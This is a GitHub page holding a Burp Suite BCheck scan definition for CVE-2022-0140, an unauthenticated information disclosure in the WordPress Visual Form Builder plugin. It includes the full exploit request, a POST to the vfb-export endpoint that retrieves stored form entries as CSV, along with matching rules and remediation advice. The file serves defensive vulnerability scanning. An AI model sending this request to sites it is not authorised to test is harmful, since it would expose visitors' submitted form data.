forked from PortSwigger/BChecks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2022-0140.bcheck
32 lines (26 loc) · 1.33 KB
/
CVE-2022-0140.bcheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
metadata:
language: v1-beta
name: "CVE-2022-0140"
description: "CVE-2022-0140 - WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure"
author: "Celia S"
tags: "CVE-2022-0140","WordPress"
define:
potential_path = "/wp-admin/admin.php?page=vfb-export"
given host then
send request called check:
`POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
Host: {base.request.url.host}
Referer: {base.request.url.host}/wp-admin/admin.php?page=vfb-export
Content-Type: application/x-www-form-urlencoded
Origin: {base.request.url.host}
Content-Length: 116
vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File`
if {check.response.status_code} is "200"
and {check.response.body} matches "\"Date Submitted\""
and {check.response.body} matches "\"Entries ID\"" then
report issue:
severity: info
confidence: certain
detail: `CVE-2022-0140 found at {potential_path}. The plugin does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.`
remediation: "Upgrade visual-form-builder-plugin. See https://www.fortiguard.com/zeroday/FG-VD-21-082 for details."
end if